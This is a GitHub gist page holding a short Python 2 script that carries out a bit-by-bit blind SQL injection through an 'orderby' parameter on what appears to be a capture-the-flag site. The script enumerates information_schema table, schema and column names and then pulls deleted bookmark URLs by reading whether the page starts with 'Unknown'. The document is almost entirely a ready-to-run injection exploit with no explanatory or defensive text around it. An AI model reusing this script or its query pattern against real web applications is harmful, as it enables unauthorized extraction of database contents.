-
-
Save anonymous/83c86279013462fc7d5e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import string | |
| import sys | |
| url = "http://www.bitcoinctf.com/" | |
| page = "b00kmarks.php?orderby=(%s)&limit=1" | |
| # Table names | |
| # query = "(select 1 from (select table_name from information_schema.tables limit %s,1) a where (ord(substring(a.table_name, %s, 1)) %s26 %s) = %s union all select 1)" | |
| # Table schema | |
| # query = "(select 1 from (select distinct table_schema from information_schema.tables limit %s,1) a where (ord(substring(a.table_schema, %s, 1)) %s26 %s) = %s union all select 1)" | |
| # Column names | |
| # query = "(select 1 from (select distinct column_name from information_schema.columns where table_name = 'urls' and table_schema = 'bookmark' limit %s,1) a where (ord(substring(a.column_name, %s, 1)) %s26 %s) = %s union all select 1)" | |
| # Bookmarks | |
| query = "(select 1 from (select distinct url from bookmark.urls where deleted = 1 limit %s,1) a where (ord(substring(a.url, %s, 1)) %s26 %s) = %s union all select 1)" | |
| #query = "(select 1 from (select distinct addedby from bookmark.urls where deleted = 1 limit %s,1) a where (ord(substring(a.addedby, %s, 1)) %s26 %s) = %s union all select 1)" | |
| #for i in range(0, 99): | |
| i = 0 | |
| for j in range(1, 18): | |
| value = 0 | |
| for c in range(8): | |
| exp = 2**c | |
| response = requests.get(url + page % (query % (i, j, '%', exp, exp))) | |
| if response.text[:7] == "Unknown": | |
| value += exp | |
| if value == 0: | |
| print "END" | |
| break | |
| print chr(value) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment